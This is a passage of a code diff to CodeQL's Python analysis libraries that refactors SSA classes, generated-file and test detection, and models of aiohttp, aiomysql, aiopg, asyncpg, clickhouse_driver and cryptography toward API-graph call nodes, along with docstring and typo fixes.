override string getAPrimaryQlClass() { result = "CallsiteRefinement" }
}
/** An implicit (possible) modification of the object referred at a method call */
class MethodCallsiteRefinement extends EssaNodeRefinement {
MethodCallsiteRefinement() {
SsaSource::method_call_refinement(this.getSourceVariable(), _, this.getDefiningNode()) and
SsaSource::method_call_refinement(pragma[only_bind_into](this.getSourceVariable()), _,
this.getDefiningNode()) and
not this instanceof SingleSuccessorGuard
}
CallNode getCall() { this.getDefiningNode() = result }
override string getAPrimaryQlClass() { result = "MethodCallsiteRefinement" }
}
/** An implicit (possible) modification of `self` at a method call */
class SelfCallsiteRefinement extends MethodCallsiteRefinement {
SelfCallsiteRefinement() { this.getSourceVariable().(Variable).isSelf() }
override string getAPrimaryQlClass() { result = "SelfCallsiteRefinement" }
}
/** Python specific sub-class of generic EssaEdgeRefinement */
/** A Python specific sub-class of generic EssaEdgeRefinement */
class PyEdgeRefinement extends EssaEdgeRefinement {
override string getRepresentation() {
/*
@@ -750,4 +796,6 @@ class PyEdgeRefinement extends EssaEdgeRefinement {
}
ControlFlowNode getTest() { result = this.getPredecessor().getLastNode() }
override string getAPrimaryQlClass() { result = "PyEdgeRefinement" }
}

View File

@@ -90,6 +90,7 @@
*/
import python
private import semmle.python.internal.CachedStages
cached
private module SsaComputeImpl {
@@ -139,7 +140,7 @@ private module SsaComputeImpl {
Liveness::liveAtEntry(v, succ)
}
/** A phi node for `v` at the beginning of basic block `b`. */
/** Holds if there is a phi node for `v` at the beginning of basic block `b`. */
cached
predicate phiNode(SsaSourceVariable v, BasicBlock b) {
(
@@ -175,8 +176,8 @@ private module SsaComputeImpl {
}
/**
* A ranking of the indices `i` at which there is an SSA definition or use of
* `v` in the basic block `b`.
* Holds if the `rankix`th definition or use of the SSA variable `v` in the basic block `b` occurs
* at index `i`.
*
* Basic block indices are translated to rank indices in order to skip
* irrelevant indices at which there is no definition or use when traversing
@@ -187,14 +188,14 @@ private module SsaComputeImpl {
i = rank[rankix](int j | variableDef(v, _, b, j) or variableUse(v, _, b, j))
}
/** A definition of a variable occurring at the specified rank index in basic block `b`. */
/** Holds if there is a definition of a variable occurring at the specified rank index in basic block `b`. */
cached
predicate defRank(SsaSourceVariable v, BasicBlock b, int rankix, int i) {
variableDef(v, _, b, i) and
defUseRank(v, b, rankix, i)
}
/** A variable access `use` of `v` in `b` at index `i`. */
/** Holds if there is a variable access `use` of `v` in `b` at index `i`. */
cached
predicate variableUse(SsaSourceVariable v, ControlFlowNode use, BasicBlock b, int i) {
(v.getAUse() = use or v.hasRefinement(use, _)) and
@@ -205,7 +206,7 @@ private module SsaComputeImpl {
}
/**
* A definition of an SSA variable occurring at the specified position.
* Holds if there is a definition of an SSA variable occurring at the specified position.
* This is either a phi node, a `VariableUpdate`, or a parameter.
*/
cached
@@ -227,7 +228,7 @@ private module SsaComputeImpl {
* dominance.
*/
/** The maximum rank index for the given variable and basic block. */
/** Gets the maximum rank index for the given variable and basic block. */
cached
int lastRank(SsaSourceVariable v, BasicBlock b) {
result = max(int rankix | defUseRank(v, b, rankix, _))
@@ -253,7 +254,7 @@ private module SsaComputeImpl {
i = piIndex()
}
/** The SSA definition reaches the rank index `rankix` in its own basic block `b`. */
/** Holds if the SSA definition reaches the rank index `rankix` in its own basic block `b`. */
cached
predicate ssaDefReachesRank(SsaSourceVariable v, BasicBlock b, int i, int rankix) {
ssaDefRank(v, b, rankix, i)
@@ -264,7 +265,7 @@ private module SsaComputeImpl {
}
/**
* The SSA definition of `v` at `def` reaches `use` in the same basic block
* Holds if the SSA definition of `v` at `def` reaches `use` in the same basic block
* without crossing another SSA definition of `v`.
*/
cached
@@ -303,11 +304,12 @@ private module SsaComputeImpl {
}
/**
* The SSA definition of `v` at `def` reaches the end of a basic block `b`, at
* Holds if the SSA definition of `v` at `def` reaches the end of a basic block `b`, at
* which point it is still live, without crossing another SSA definition of `v`.
*/
cached
predicate reachesEndOfBlock(SsaSourceVariable v, BasicBlock defbb, int defindex, BasicBlock b) {
Stages::AST::ref() and
Liveness::liveAtExit(v, b) and
(
defbb = b and
@@ -320,7 +322,7 @@ private module SsaComputeImpl {
}
/**
* The SSA definition of `v` at `(defbb, defindex)` reaches `use` without crossing another
* Holds if the SSA definition of `v` at `(defbb, defindex)` reaches `use` without crossing another
* SSA definition of `v`.
*/
cached
@@ -360,7 +362,7 @@ private module SsaComputeImpl {
i = rank[rankix](int j | variableDefine(v, _, b, j) or variableSourceUse(v, _, b, j))
}
/** A variable access `use` of `v` in `b` at index `i`. */
/** Holds if there is a variable access `use` of `v` in `b` at index `i`. */
cached
predicate variableSourceUse(SsaSourceVariable v, ControlFlowNode use, BasicBlock b, int i) {
v.getASourceUse() = use and
@@ -494,8 +496,8 @@ private module SsaComputeImpl {
predicate firstUse(EssaDefinition def, ControlFlowNode use) {
exists(SsaSourceVariable v, BasicBlock b1, int i1, BasicBlock b2, int i2 |
adjacentVarRefs(v, b1, i1, b2, i2) and
definesAt(def, v, b1, i1) and
variableSourceUse(v, use, b2, i2)
definesAt(def, pragma[only_bind_into](v), b1, i1) and
variableSourceUse(pragma[only_bind_into](v), use, b2, i2)
)
or
exists(

View File

@@ -4,13 +4,14 @@
*/
import python
private import semmle.python.pointsto.Base
private import semmle.python.internal.CachedStages
cached
module SsaSource {
/** Holds if `v` is used as the receiver in a method call. */
cached
predicate method_call_refinement(Variable v, ControlFlowNode use, CallNode call) {
Stages::AST::ref() and
use = v.getAUse() and
call.getFunction().(AttrNode).getObject() = use and
not test_contains(_, call)

View File

@@ -14,7 +14,7 @@ abstract class GeneratedFile extends File {
* There is no formal reason for the above, it just seems to work well in practice.
*/
library class GenericGeneratedFile extends GeneratedFile {
class GenericGeneratedFile extends GeneratedFile {
GenericGeneratedFile() {
not this instanceof SpecificGeneratedFile and
(
@@ -32,18 +32,26 @@ library class GenericGeneratedFile extends GeneratedFile {
override string getTool() { lax_generated_by(this, result) or strict_generated_by(this, result) }
}
pragma[nomagic]
private int minStmtLine(File file) {
result =
min(int line |
line = any(Stmt s | s.getLocation().getFile() = file).getLocation().getStartLine()
)
}
pragma[nomagic]
private predicate isCommentAfterCode(Comment c, File f) {
f = c.getLocation().getFile() and
minStmtLine(f) < c.getLocation().getStartLine()
}
private string comment_or_docstring(File f, boolean before_code) {
exists(Comment c |
c.getLocation().getFile() = f and
result = c.getText()
|
if
exists(Stmt s |
s.getEnclosingModule().getFile() = f and
s.getLocation().getStartLine() < c.getLocation().getStartLine()
)
then before_code = false
else before_code = true
if isCommentAfterCode(c, f) then before_code = false else before_code = true
)
or
exists(Module m | m.getFile() = f |
@@ -103,7 +111,7 @@ private predicate auto_generated(File f) {
/**
* A file generated by a template engine
*/
abstract library class SpecificGeneratedFile extends GeneratedFile {
abstract class SpecificGeneratedFile extends GeneratedFile {
/*
* Currently cover Spitfire, Pyxl and Mako.
* Django templates are not compiled to Python.
@@ -112,7 +120,7 @@ abstract library class SpecificGeneratedFile extends GeneratedFile {
}
/** File generated by the spitfire templating engine */
/** A file generated by the spitfire templating engine */
class SpitfireGeneratedFile extends SpecificGeneratedFile {
SpitfireGeneratedFile() {
exists(Module m | m.getFile() = this and not m instanceof SpitfireTemplate |
@@ -127,14 +135,14 @@ class SpitfireGeneratedFile extends SpecificGeneratedFile {
override string getTool() { result = "spitfire" }
}
/** File generated by the pyxl templating engine */
/** A file generated by the pyxl templating engine */
class PyxlGeneratedFile extends SpecificGeneratedFile {
PyxlGeneratedFile() { this.getSpecifiedEncoding() = "pyxl" }
override string getTool() { result = "pyxl" }
}
/** File generated by the mako templating engine */
/** A file generated by the mako templating engine */
class MakoGeneratedFile extends SpecificGeneratedFile {
MakoGeneratedFile() {
exists(Module m | m.getFile() = this |
@@ -166,7 +174,7 @@ string from_mako_import(Module m) {
)
}
/** File generated by Google's protobuf tool. */
/** A file generated by Google's protobuf tool. */
class ProtobufGeneratedFile extends SpecificGeneratedFile {
ProtobufGeneratedFile() {
this.getAbsolutePath().regexpMatch(".*_pb2?.py") and

View File

@@ -15,7 +15,7 @@ class UnitTestClass extends TestScope {
abstract class Test extends TestScope { }
/** Class of test function that uses the `unittest` framework */
/** A test function that uses the `unittest` framework */
class UnitTestFunction extends Test {
UnitTestFunction() {
this.getScope+() instanceof UnitTestClass and
@@ -37,7 +37,7 @@ class NoseTestFunction extends Test {
}
}
/** Class of functions that are clearly tests, but don't belong to a specific framework */
/** A function that is clearly a test, but doesn't belong to a specific framework */
class UnknownTestFunction extends Test {
UnknownTestFunction() {
this.(Function).getName().matches("test%") and

View File

@@ -243,7 +243,9 @@ module AiohttpWebModel {
/** A class that has a super-type which is an aiohttp.web View class. */
class AiohttpViewClassFromSuperClass extends AiohttpViewClass {
AiohttpViewClassFromSuperClass() { this.getABase() = View::subclassRef().getAUse().asExpr() }
AiohttpViewClassFromSuperClass() {
this.getParent() = View::subclassRef().getAnImmediateUse().asExpr()
}
}
/** A class that is used in a route-setup, therefore being considered an aiohttp.web View class. */
@@ -639,3 +641,53 @@ module AiohttpWebModel {
override DataFlow::Node getValueArg() { result = value }
}
}
/**
* Provides models for the web server part (`aiohttp.client`) of the `aiohttp` PyPI package.
* See https://docs.aiohttp.org/en/stable/client.html
*/
private module AiohttpClientModel {
/**
* Provides models for the `aiohttp.ClientSession` class
*
* See https://docs.aiohttp.org/en/stable/client_reference.html#aiohttp.ClientSession.
*/
module ClientSession {
/** Gets a reference to the `aiohttp.ClientSession` class. */
private API::Node classRef() {
result = API::moduleImport("aiohttp").getMember("ClientSession")
}
/** Gets a reference to an instance of `aiohttp.ClientSession`. */
private API::Node instance() { result = classRef().getReturn() }
/** A method call on a ClientSession that sends off a request */
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
string methodName;
OutgoingRequestCall() {
methodName in [HTTP::httpVerbLower(), "request"] and
this = instance().getMember(methodName).getACall()
}
override DataFlow::Node getAUrlPart() {
result = this.getArgByName("url")
or
not methodName = "request" and
result = this.getArg(0)
or
methodName = "request" and
result = this.getArg(1)
}
override string getFramework() { result = "aiohttp.ClientSession" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}

View File

@@ -15,7 +15,7 @@ private module Aiomysql {
private import semmle.python.internal.Awaited
/**
* A `ConectionPool` is created when the result of `aiomysql.create_pool()` is awaited.
* Gets a `ConnectionPool` that is created when the result of `aiomysql.create_pool()` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/pool.html
*/
API::Node connectionPool() {
@@ -23,9 +23,9 @@ private module Aiomysql {
}
/**
* A `Connection` is created when
* Gets a `Connection` that is created when
* - the result of `aiomysql.connect()` is awaited.
* - the result of calling `aquire` on a `ConnectionPool` is awaited.
* - the result of calling `acquire` on a `ConnectionPool` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/connection.html#connection
*/
API::Node connection() {
@@ -35,7 +35,7 @@ private module Aiomysql {
}
/**
* A `Cursor` is created when
* Gets a `Cursor` that is created when
* - the result of calling `cursor` on a `ConnectionPool` is awaited.
* - the result of calling `cursor` on a `Connection` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/cursors.html
@@ -47,45 +47,29 @@ private module Aiomysql {
}
/**
* Calling `execute` on a `Cursor` constructs a query.
* A query. Calling `execute` on a `Cursor` constructs a query.
* See https://aiomysql.readthedocs.io/en/stable/cursors.html#Cursor.execute
*/
class CursorExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class CursorExecuteCall extends SqlConstruction::Range, API::CallNode {
CursorExecuteCall() { this = cursor().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("operation")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "operation").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode cursorExecuteCall(DataFlow::TypeTracker t, DataFlow::Node sql) {
// cursor created from connection
t.start() and
sql = result.(CursorExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = cursorExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node cursorExecuteCall(DataFlow::Node sql) {
cursorExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiomysql.readthedocs.io/en/stable/cursors.html#Cursor.execute
*/
class AwaitedCursorExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
CursorExecuteCall executeCall;
AwaitedCursorExecuteCall() { this = awaited(cursorExecuteCall(sql)) }
AwaitedCursorExecuteCall() { this = executeCall.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = executeCall.getSql() }
}
/**
* An `Engine` is created when the result of calling `aiomysql.sa.create_engine` is awaited.
* Gets an `Engine` that is created when the result of calling `aiomysql.sa.create_engine` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#engine
*/
API::Node engine() {
@@ -98,48 +82,30 @@ private module Aiomysql {
}
/**
* A `SAConnection` is created when the result of calling `aquire` on an `Engine` is awaited.
* Gets an `SAConnection` that is created when the result of calling `acquire` on an `Engine` is awaited.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#connection
*/
API::Node saConnection() { result = engine().getMember("acquire").getReturn().getAwaited() }
/**
* Calling `execute` on a `SAConnection` constructs a query.
* A query. Calling `execute` on a `SAConnection` constructs a query.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#aiomysql.sa.SAConnection.execute
*/
class SAConnectionExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class SAConnectionExecuteCall extends SqlConstruction::Range, API::CallNode {
SAConnectionExecuteCall() { this = saConnection().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode saConnectionExecuteCall(
DataFlow::TypeTracker t, DataFlow::Node sql
) {
// saConnection created from engine
t.start() and
sql = result.(SAConnectionExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = saConnectionExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node saConnectionExecuteCall(DataFlow::Node sql) {
saConnectionExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiomysql.readthedocs.io/en/stable/sa.html#aiomysql.sa.SAConnection.execute
*/
class AwaitedSAConnectionExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
SAConnectionExecuteCall execute;
AwaitedSAConnectionExecuteCall() { this = awaited(saConnectionExecuteCall(sql)) }
AwaitedSAConnectionExecuteCall() { this = execute.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = execute.getSql() }
}
}

View File

@@ -15,7 +15,7 @@ private module Aiopg {
private import semmle.python.internal.Awaited
/**
* A `ConectionPool` is created when the result of `aiopg.create_pool()` is awaited.
* Gets a `ConnectionPool` that is created when the result of `aiopg.create_pool()` is awaited.
* See https://aiopg.readthedocs.io/en/stable/core.html#pool
*/
API::Node connectionPool() {
@@ -23,9 +23,9 @@ private module Aiopg {
}
/**
* A `Connection` is created when
* Gets a `Connection` that is created when
* - the result of `aiopg.connect()` is awaited.
* - the result of calling `aquire` on a `ConnectionPool` is awaited.
* - the result of calling `acquire` on a `ConnectionPool` is awaited.
* See https://aiopg.readthedocs.io/en/stable/core.html#connection
*/
API::Node connection() {
@@ -35,7 +35,7 @@ private module Aiopg {
}
/**
* A `Cursor` is created when
* Gets a `Cursor` that is created when
* - the result of calling `cursor` on a `ConnectionPool` is awaited.
* - the result of calling `cursor` on a `Connection` is awaited.
* See https://aiopg.readthedocs.io/en/stable/core.html#cursor
@@ -47,45 +47,29 @@ private module Aiopg {
}
/**
* Calling `execute` on a `Cursor` constructs a query.
* A query. Calling `execute` on a `Cursor` constructs a query.
* See https://aiopg.readthedocs.io/en/stable/core.html#aiopg.Cursor.execute
*/
class CursorExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class CursorExecuteCall extends SqlConstruction::Range, API::CallNode {
CursorExecuteCall() { this = cursor().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("operation")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "operation").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode cursorExecuteCall(DataFlow::TypeTracker t, DataFlow::Node sql) {
// cursor created from connection
t.start() and
sql = result.(CursorExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = cursorExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node cursorExecuteCall(DataFlow::Node sql) {
cursorExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiopg.readthedocs.io/en/stable/core.html#aiopg.Cursor.execute
*/
class AwaitedCursorExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
CursorExecuteCall execute;
AwaitedCursorExecuteCall() { this = awaited(cursorExecuteCall(sql)) }
AwaitedCursorExecuteCall() { this = execute.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = execute.getSql() }
}
/**
* An `Engine` is created when the result of calling `aiopg.sa.create_engine` is awaited.
* Gets an `Engine` that is created when the result of calling `aiopg.sa.create_engine` is awaited.
* See https://aiopg.readthedocs.io/en/stable/sa.html#engine
*/
API::Node engine() {
@@ -94,48 +78,30 @@ private module Aiopg {
}
/**
* A `SAConnection` is created when the result of calling `aquire` on an `Engine` is awaited.
* Gets an `SAConnection` that is created when the result of calling `acquire` on an `Engine` is awaited.
* See https://aiopg.readthedocs.io/en/stable/sa.html#connection
*/
API::Node saConnection() { result = engine().getMember("acquire").getReturn().getAwaited() }
/**
* Calling `execute` on a `SAConnection` constructs a query.
* A query. Calling `execute` on a `SAConnection` constructs a query.
* See https://aiopg.readthedocs.io/en/stable/sa.html#aiopg.sa.SAConnection.execute
*/
class SAConnectionExecuteCall extends SqlConstruction::Range, DataFlow::CallCfgNode {
class SAConnectionExecuteCall extends SqlConstruction::Range, API::CallNode {
SAConnectionExecuteCall() { this = saConnection().getMember("execute").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
/**
* This is only needed to connect the argument to the execute call with the subsequnt awaiting.
* It should be obsolete once we have `API::CallNode` available.
*/
private DataFlow::TypeTrackingNode saConnectionExecuteCall(
DataFlow::TypeTracker t, DataFlow::Node sql
) {
// saConnection created from engine
t.start() and
sql = result.(SAConnectionExecuteCall).getSql()
or
exists(DataFlow::TypeTracker t2 | result = saConnectionExecuteCall(t2, sql).track(t2, t))
}
DataFlow::Node saConnectionExecuteCall(DataFlow::Node sql) {
saConnectionExecuteCall(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
/**
* Awaiting the result of calling `execute` executes the query.
* An awaited query. Awaiting the result of calling `execute` executes the query.
* See https://aiopg.readthedocs.io/en/stable/sa.html#aiopg.sa.SAConnection.execute
*/
class AwaitedSAConnectionExecuteCall extends SqlExecution::Range {
DataFlow::Node sql;
SAConnectionExecuteCall excute;
AwaitedSAConnectionExecuteCall() { this = awaited(saConnectionExecuteCall(sql)) }
AwaitedSAConnectionExecuteCall() { this = excute.getReturn().getAwaited().getAnImmediateUse() }
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = excute.getSql() }
}
}

View File

@@ -12,15 +12,15 @@ private import semmle.python.ApiGraphs
private module Asyncpg {
private import semmle.python.internal.Awaited
/** A `ConectionPool` is created when the result of `asyncpg.create_pool()` is awaited. */
/** Gets a `ConnectionPool` that is created when the result of `asyncpg.create_pool()` is awaited. */
API::Node connectionPool() {
result = API::moduleImport("asyncpg").getMember("create_pool").getReturn().getAwaited()
}
/**
* A `Connection` is created when
* Gets a `Connection` that is created when
* - the result of `asyncpg.connect()` is awaited.
* - the result of calling `aquire` on a `ConnectionPool` is awaited.
* - the result of calling `acquire` on a `ConnectionPool` is awaited.
*/
API::Node connection() {
result = API::moduleImport("asyncpg").getMember("connect").getReturn().getAwaited()
@@ -33,8 +33,8 @@ private module Asyncpg {
string methodName;
SqlExecutionOnConnection() {
methodName in ["copy_from_query", "execute", "fetch", "fetchrow", "fetchval", "executemany"] and
this.calls([connectionPool().getAUse(), connection().getAUse()], methodName)
this = [connectionPool(), connection()].getMember(methodName).getACall() and
methodName in ["copy_from_query", "execute", "fetch", "fetchrow", "fetchval", "executemany"]
}
override DataFlow::Node getSql() {
@@ -46,13 +46,13 @@ private module Asyncpg {
}
}
/** `Connection`s and `ConnectionPool`s provide some methods that access the file system. */
/** A model of `Connection` and `ConnectionPool`, which provide some methods that access the file system. */
class FileAccessOnConnection extends FileSystemAccess::Range, DataFlow::MethodCallNode {
string methodName;
FileAccessOnConnection() {
methodName in ["copy_from_query", "copy_from_table", "copy_to_table"] and
this.calls([connectionPool().getAUse(), connection().getAUse()], methodName)
this = [connectionPool(), connection()].getMember(methodName).getACall() and
methodName in ["copy_from_query", "copy_from_table", "copy_to_table"]
}
// The path argument is keyword only.
@@ -69,50 +69,29 @@ private module Asyncpg {
* Provides models of the `PreparedStatement` class in `asyncpg`.
* `PreparedStatement`s are created when the result of calling `prepare(query)` on a connection is awaited.
* The result of calling `prepare(query)` is a `PreparedStatementFactory` and the argument, `query` needs to
* be tracked to the place where a `PreparedStatement` is created and then futher to any executing methods.
* be tracked to the place where a `PreparedStatement` is created and then further to any executing methods.
* Hence the two type trackers.
*
* TODO: Rewrite this, once we have `API::CallNode` available.
*/
module PreparedStatement {
class PreparedStatementConstruction extends SqlConstruction::Range, DataFlow::CallCfgNode {
class PreparedStatementConstruction extends SqlConstruction::Range, API::CallNode {
PreparedStatementConstruction() { this = connection().getMember("prepare").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
private DataFlow::TypeTrackingNode preparedStatementFactory(
DataFlow::TypeTracker t, DataFlow::Node sql
) {
t.start() and
sql = result.(PreparedStatementConstruction).getSql()
or
exists(DataFlow::TypeTracker t2 | result = preparedStatementFactory(t2, sql).track(t2, t))
}
DataFlow::Node preparedStatementFactory(DataFlow::Node sql) {
preparedStatementFactory(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
private DataFlow::TypeTrackingNode preparedStatement(DataFlow::TypeTracker t, DataFlow::Node sql) {
t.start() and
result = awaited(preparedStatementFactory(sql))
or
exists(DataFlow::TypeTracker t2 | result = preparedStatement(t2, sql).track(t2, t))
}
DataFlow::Node preparedStatement(DataFlow::Node sql) {
preparedStatement(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
class PreparedStatementExecution extends SqlExecution::Range, DataFlow::MethodCallNode {
DataFlow::Node sql;
class PreparedStatementExecution extends SqlExecution::Range, API::CallNode {
PreparedStatementConstruction prepareCall;
PreparedStatementExecution() {
this.calls(preparedStatement(sql), ["executemany", "fetch", "fetchrow", "fetchval"])
this =
prepareCall
.getReturn()
.getAwaited()
.getMember(["executemany", "fetch", "fetchrow", "fetchval"])
.getACall()
}
override DataFlow::Node getSql() { result = sql }
override DataFlow::Node getSql() { result = prepareCall.getSql() }
}
}
@@ -124,37 +103,36 @@ private module Asyncpg {
* The result of calling `cursor` in either case is a `CursorFactory` and the argument, `query` needs to
* be tracked to the place where a `Cursor` is created, hence the type tracker.
* The creation of the `Cursor` executes the query.
*
* TODO: Rewrite this, once we have `API::CallNode` available.
*/
module Cursor {
class CursorConstruction extends SqlConstruction::Range, DataFlow::CallCfgNode {
class CursorConstruction extends SqlConstruction::Range, API::CallNode {
CursorConstruction() { this = connection().getMember("cursor").getACall() }
override DataFlow::Node getSql() { result in [this.getArg(0), this.getArgByName("query")] }
}
private DataFlow::TypeTrackingNode cursorFactory(DataFlow::TypeTracker t, DataFlow::Node sql) {
// cursor created from connection
t.start() and
sql = result.(CursorConstruction).getSql()
or
// cursor created from prepared statement
t.start() and
result.(DataFlow::MethodCallNode).calls(PreparedStatement::preparedStatement(sql), "cursor")
or
exists(DataFlow::TypeTracker t2 | result = cursorFactory(t2, sql).track(t2, t))
}
DataFlow::Node cursorFactory(DataFlow::Node sql) {
cursorFactory(DataFlow::TypeTracker::end(), sql).flowsTo(result)
override DataFlow::Node getSql() { result = this.getParameter(0, "query").getARhs() }
}
/** The creation of a `Cursor` executes the associated query. */
class CursorCreation extends SqlExecution::Range {
DataFlow::Node sql;
CursorCreation() { this = awaited(cursorFactory(sql)) }
CursorCreation() {
exists(CursorConstruction c |
sql = c.getSql() and
this = c.getReturn().getAwaited().getAnImmediateUse()
)
or
exists(PreparedStatement::PreparedStatementConstruction prepareCall |
sql = prepareCall.getSql() and
this =
prepareCall
.getReturn()
.getAwaited()
.getMember("cursor")
.getReturn()
.getAwaited()
.getAnImmediateUse()
)
}
override DataFlow::Node getSql() { result = sql }
}

View File

@@ -20,7 +20,7 @@ private import semmle.python.frameworks.PEP249
*/
module ClickhouseDriver {
/**
* `clickhouse_driver` implements PEP249,
* A model of `clickhouse-driver`, which implements PEP249,
* providing ways to execute SQL statements against a database.
*/
class ClickHouseDriverPEP249 extends PEP249::PEP249ModuleApiNode {

View File

@@ -22,7 +22,7 @@ private module CryptographyModel {
* Gets a predefined curve class from
* `cryptography.hazmat.primitives.asymmetric.ec` with a specific key size (in bits).
*/
private API::Node predefinedCurveClass(int keySize) {
API::Node predefinedCurveClass(int keySize) {
exists(string curveName |
result =
API::moduleImport("cryptography")
@@ -73,41 +73,6 @@ private module CryptographyModel {
curveName = "BrainpoolP512R1" and keySize = 512
)
}
/** Gets a reference to a predefined curve class with a specific key size (in bits), as well as the origin of the class. */
private DataFlow::TypeTrackingNode curveClassWithKeySize(
DataFlow::TypeTracker t, int keySize, DataFlow::Node origin
) {
t.start() and
result = predefinedCurveClass(keySize).getAnImmediateUse() and
origin = result
or
exists(DataFlow::TypeTracker t2 |
result = curveClassWithKeySize(t2, keySize, origin).track(t2, t)
)
}
/** Gets a reference to a predefined curve class with a specific key size (in bits), as well as the origin of the class. */
DataFlow::Node curveClassWithKeySize(int keySize, DataFlow::Node origin) {
curveClassWithKeySize(DataFlow::TypeTracker::end(), keySize, origin).flowsTo(result)
}
/** Gets a reference to a predefined curve class instance with a specific key size (in bits), as well as the origin of the class. */
private DataFlow::TypeTrackingNode curveClassInstanceWithKeySize(
DataFlow::TypeTracker t, int keySize, DataFlow::Node origin
) {
t.start() and
result.(DataFlow::CallCfgNode).getFunction() = curveClassWithKeySize(keySize, origin)
or
exists(DataFlow::TypeTracker t2 |
result = curveClassInstanceWithKeySize(t2, keySize, origin).track(t2, t)
)
}
/** Gets a reference to a predefined curve class instance with a specific key size (in bits), as well as the origin of the class. */
DataFlow::Node curveClassInstanceWithKeySize(int keySize, DataFlow::Node origin) {
curveClassInstanceWithKeySize(DataFlow::TypeTracker::end(), keySize, origin).flowsTo(result)
}
}
// ---------------------------------------------------------------------------
@@ -179,9 +144,13 @@ private module CryptographyModel {
DataFlow::Node getCurveArg() { result in [this.getArg(0), this.getArgByName("curve")] }
override int getKeySizeWithOrigin(DataFlow::Node origin) {
this.getCurveArg() = Ecc::curveClassInstanceWithKeySize(result, origin)
or
this.getCurveArg() = Ecc::curveClassWithKeySize(result, origin)
exists(API::Node n |
n = Ecc::predefinedCurveClass(result) and origin = n.getAnImmediateUse()
|
this.getCurveArg() = n.getAUse()
or
this.getCurveArg() = n.getReturn().getAUse()
)
}
// Note: There is not really a key-size argument, since it's always specified by the curve.
@@ -202,9 +171,8 @@ private module CryptographyModel {
}
/** Gets a reference to a Cipher instance using algorithm with `algorithmName`. */
DataFlow::TypeTrackingNode cipherInstance(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
exists(DataFlow::CallCfgNode call | result = call |
API::Node cipherInstance(string algorithmName) {
exists(API::CallNode call | result = call.getReturn() |
call =
API::moduleImport("cryptography")
.getMember("hazmat")
@@ -216,47 +184,6 @@ private module CryptographyModel {
call.getArg(0), call.getArgByName("algorithm")
]
)
or
exists(DataFlow::TypeTracker t2 | result = cipherInstance(t2, algorithmName).track(t2, t))
}
/** Gets a reference to a Cipher instance using algorithm with `algorithmName`. */
DataFlow::Node cipherInstance(string algorithmName) {
cipherInstance(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
/** Gets a reference to the encryptor of a Cipher instance using algorithm with `algorithmName`. */
DataFlow::TypeTrackingNode cipherEncryptor(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
result.(DataFlow::MethodCallNode).calls(cipherInstance(algorithmName), "encryptor")
or
exists(DataFlow::TypeTracker t2 | result = cipherEncryptor(t2, algorithmName).track(t2, t))
}
/**
* Gets a reference to the encryptor of a Cipher instance using algorithm with `algorithmName`.
*
* You obtain an encryptor by using the `encryptor()` method on a Cipher instance.
*/
DataFlow::Node cipherEncryptor(string algorithmName) {
cipherEncryptor(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
